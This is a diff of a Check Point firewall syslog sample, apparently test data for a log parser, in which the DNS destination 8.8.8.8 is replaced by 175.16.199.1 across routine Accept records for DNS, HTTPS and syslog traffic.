+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47070"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38626"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f6,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48538"; service:"443"; service_id:"https"; src:"192.168.1.205"]
 <134>1 2020-03-29T17:25:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48540"; service:"443"; service_id:"https"; src:"192.168.1.205"]
 <134>1 2020-03-29T17:25:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9f7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48542"; service:"443"; service_id:"https"; src:"192.168.1.205"]
@@ -2859,21 +2859,21 @@
 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50640"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50641"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50642"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:25:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da08,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da18,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502744"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42604"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da08,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da18,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502744"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42604"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:25:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50643"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50644"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [flags:"311296"; ifdir:"outbound"; ifname:"eth1"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; log_id:"2"; product:"Anti Malware"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48772"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48774"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50145"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33465"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50145"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
